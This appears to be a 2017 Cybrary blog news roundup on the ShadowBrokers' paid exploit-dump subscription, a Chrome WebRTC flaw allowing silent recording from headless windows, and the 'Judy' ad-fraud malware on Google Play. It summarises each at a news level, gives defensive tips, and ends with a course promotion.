Ready to Start Your Career?

UNM4SK3D: ShadowBrokers, Chrome, and Google Play

Olivia 's profile image

By: Olivia

June 2, 2017



Move over 'Wine of the Month Club,' there's a new subscription service in town. On May 30th, hacking group the ShadowBrokers announced their 'Monthly Dump Service' with a hefty pricetag of 100 Zcash (approximately $23,000 USD) monthly and instructions on how to subscribe.In case you've forgotten, the ShadowBrokers were responsible for leaking the SMB exploit that was used to spread WannaCry ransomware worldwide. The unknowns behind this group have only continued to heighten the world's anxiety since the WannaCry attack, promising to release browser, router and mobile exploits, attacks targeting Windows 10 machines, to the release of data stolen from SWIFT providers, central banks, and Russian, Chinese, Iranian or North Korean nuclear and missile programs. Allegedly, the first dump is expected to be released sometime between July 1st and July 17th to all confirmed subscribers. Those subscribers, in addition to payment, must provide a 'delivery email address' to which they will send an email containing a link and their unique password for each data dump.ShadowBrokers says the membership has been kept expensive because the data dump has been intended for specific groups, stating, "If you caring about losing $20k+ Euro then not being for you. Monthly dump is being for high rollers, hackers, security companies, OEMs, and governments." Their requested currency, meanwhile, is a story of its own. Zcash is a new cryptocurrency currency that claims to be more anonymous than Bitcoin, as the sender, recipient, and value of transactions remain hidden. Still, the group seems to doubt even Zcash's anonymity openly via social media in broken English. While they were initially not taken seriously by many, it seems that security experts are changing their tune,  since its previously released dump turned out to be legitimate. The validity of their newly promised dumps have yet to be verified, but assuming they are, we should likely expect companies to buy the dumps for $21,000 per month and secure their products before hackers get their hands on new zero-day exploits.
This is being wrong question. Question to be asking ‘Can my organization afford not to be first to get access to theshadowbrokers dumps? -statement from ShadowBrokers
Want to learn more about the hacking group? Read 'Shining Light on the ShadowBrokers.'


Is this a flaw or a bug? That's the question many are asking after AOL developer Ran Bar-Zik reported a vulnerability to Google in April, which could allow malicious websites to record audio or video without alerting the user.Ran Bar-Zik first discovered the issue at work, while dealing with a website that ran WebRTC (Web Real-Time Communications) code. It's important to note web browser based audio-video communication relies on WebRTC protocol, which enables real-time communication over peer-to-peer connections without the use of plugins. "To protect unauthorized streaming of audio and video without user's permission, the web browser first request users to explicitly allow websites to use WebRTC and access device camera/microphone. Once granted, the website will have access to your camera and microphone forever until you manually revoke WebRTC permissions." Typically, web browsers indicate their users when any audio or video is being recorded, but in this case, they do not.If any authorized website pop-ups a headless window using a JavaScript code, it can start recording audio and video secretly, without the red dot icon, giving no indications in the browser that streaming is happening. Chrome has not been designed to display a red-dot indication on headless windows, allowing site developers to "exploit small UX manipulation to activate the MediaRecorder API without alerting the users." So far, the 'Big G' declined to consider the apparent vulnerability a valid security issue, which means that there is no official patch on the way. In a statement, they've acknowledged they "are looking at ways to improve this situation." Regardless if this is a bug or not, it is certainly a privacy issue, which could be exploited by hackers. We recommend disabling WebRTC if you do not need it.
Real attack will not be very obvious of course. It can use very small pop-under and submit the data anywhere and close it when the user is focusing on it. It can use the camera for millisecond to get your picture. -Ran Bar-Zik, AOL Developer
For tips and tricks on securing your favorite browser, read 'Workarounds for Chrome.' 


Judy's causing a lot of issues. And we're not talking about the famous TV Judge. This Judy is the name of an adware program that is being used to generate fraudulent clicks to generate revenue from advertisements, perhaps the largest malware campaign on Google Play Store. According to security firm Checkpoint, the malware has already infected around 36.5 million Android devices with malicious ad-click software. In a blog post published May 26th, they revealed over 41 apps developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp, create fake advertisement clicks from the infected devices. Researchers also uncovered a few more apps published by other developers within the Play Store, containing the same the 'Judy' malware. So far, "the connection between the two campaigns remains unclear, though researchers believe it is possible that one developer borrowed code from the other, 'knowingly or unknowingly'." It appears that these malicious apps have been in operation for over a year.The malicious apps, which all contain 'Judy' in the title and are variations of similar themes (Fashion Judy: Snow Queen style, Animal Judy: Persian cat care, and Chef Judy: Halloween Cookies, to name a few,) are legitimate games. In the background, they act as a bridge to connect the victim’s device to the adware server. Once downloaded, the app silently registers user devices to a remote command and control server, where it receives the actual malicious payload containing a JavaScript that starts the process. Then, when the connection is established,  the malicious apps spoof user agents to imitate itself as a desktop browser to open a page and generate clicks. Researchers say, "Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure." Google has since removed the apps from Google Play, but if you have any downloaded on your phone, be sure to remove them immediately.
It is quite unusual to find an actual organization behind the mobile malware, as most of them are developed by purely malicious actors. -Checkpoint security researchers
Protect yourself in the Google Play store. Read 'How to Identify Malware/ Spyware Attacks.'


The 2017 Global Threat Intelligence Report (GTIR) by NTT Security reveals that 77% of all detected ransomware globally was in four main sectors – business & professional services (28%), government (19%), healthcare (15%) and retail (15%).


The question that is of most concern to us is: how do you make sure what we’re doing supports and is strategically aligned with the business?In order to develop an effective security strategy, one must take a proactive response to security threats. This requires thorough planning and a deep understanding of the concepts, methods, and goals of security strategy.The Developing a Security Strategy Micro Certification narrows in on the six outcomes of effective security strategy, enabling you to understand the reasoning behind the six outcomes of effective security management and why it is important that personnel support the goals of the business. In this lesson, participants will become familiar with the relationships of outcomes with management directives.Use code OBLOG50 for half off any micro certification. olivia2Olivia Lynch (@Cybrary_Olivia) is the Marketing Manager at Cybrary. Like many of you, she is just getting her toes wet in the infosec field and is working to make cyber security news more interesting. A firm believer that the pen is mightier than the sword, Olivia considers corny puns and an honest voice essential to any worthwhile blog.
Schedule Demo